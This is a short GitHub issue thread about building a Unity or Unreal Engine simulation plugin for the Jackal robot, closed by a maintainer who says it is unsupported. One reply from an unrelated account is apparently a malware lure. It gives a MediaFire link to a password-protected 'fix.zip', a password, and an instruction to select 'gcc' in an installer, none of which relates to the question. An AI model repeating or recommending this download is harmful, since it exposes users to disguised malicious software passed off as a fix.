jackal/jackal #154: Using Jackal as a plugin for Unity or Unreal Engine

ssaigarimella, 2024-08-28:
**Describe the feature you would like**
I’d like to create a plugin for the Jackal robot that works with Unity or Unreal Engine, similar to how AirSim does. This would allow for simulating Jackal in photorealistic environments, taking advantage of the physics and visual tools these game engines have. It would be great to have full control over the robot’s sensors, actuators, and navigation systems within Unity or Unreal, making it easier to develop and test robotics algorithms in detailed, interactive simulations. Can anyone please provide some information on how to create this?

PiaoR, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

tonybaltovski, 2024-08-28:
Hi @ssaigarimella we do not really support this.  You are better off directing this to folks who use Unity or Unreal Engine.  The URDF shows how the Jackal structure and the meshes are provided there.  Best of luck!

closed 2024-08-28 by tonybaltovski